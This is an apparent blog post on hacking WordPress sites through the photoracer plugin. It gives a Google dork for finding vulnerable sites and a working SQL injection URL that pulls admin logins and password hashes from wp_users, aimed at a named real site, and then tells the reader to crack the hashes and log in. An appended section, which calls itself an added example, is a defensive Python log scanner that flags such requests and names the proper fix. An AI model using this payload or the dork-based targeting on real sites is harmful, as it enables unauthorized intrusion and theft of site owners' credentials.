In this post I'll tell you the SIMPLEST WAY TO HACK ANY WORDPRESS BASED SITE.
First we'll use this dork to search for websites with the help of Google:
inurl:"wp-content/plugins/photoracer/viewimg.php?id="
Results:
I'm now gonna test one of them..
For example:
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2
Now add the Exploit..
/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
This is the exploit.. (GIVEN ABOVE)
And now the site address will become..
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
Now you can see the ADMIN and PASS....just crack the HASHES and you're done..
Site Admin Login page for WP
http://www.SITE-ADDRESS/wp-login.php
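
On the defending side, the request shown above stands out in web server logs, because a legitimate id for viewimg.php is a plain integer. The following Python script is an added example, not part of the original post: it flags requests to that script whose id is anything else. The combined log format, the sample lines and the token list are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Script path taken from the post; everything else here is an assumption.
TARGET = "/wp-content/plugins/photoracer/viewimg.php"
# Request line of a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL fragments that never belong in a numeric id (heuristic, not exhaustive).
SQL_TOKENS = re.compile(
    r"\b(?:union|select|concat|from|wp_users)\b|--|/\*|0x[0-9a-f]+", re.I)

def classify_id(value):
    """Return 'ok', 'non_numeric' or 'sqli' for one id value."""
    for _ in range(3):  # peel off repeated URL encoding
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    if re.fullmatch(r"\d{1,10}", value.strip()):
        return "ok"
    return "sqli" if SQL_TOKENS.search(value) else "non_numeric"

def scan(lines):
    """Return (line_number, client_ip, verdict) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith(TARGET):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("id", [""]):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((number, line.split()[0], verdict))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=2 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users-- HTTP/1.1" 200 812',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /blog/wp-content/plugins/photoracer/viewimg.php?id=-1%2520UNION%2520SELECT%25201 HTTP/1.1" 200 790',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=abc HTTP/1.1" 200 300',
    '203.0.113.7 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?id=1+union+select HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit here only shows that someone tried; the actual fix is for the plugin to treat id as an integer (or bind it in a prepared statement) before it reaches the query.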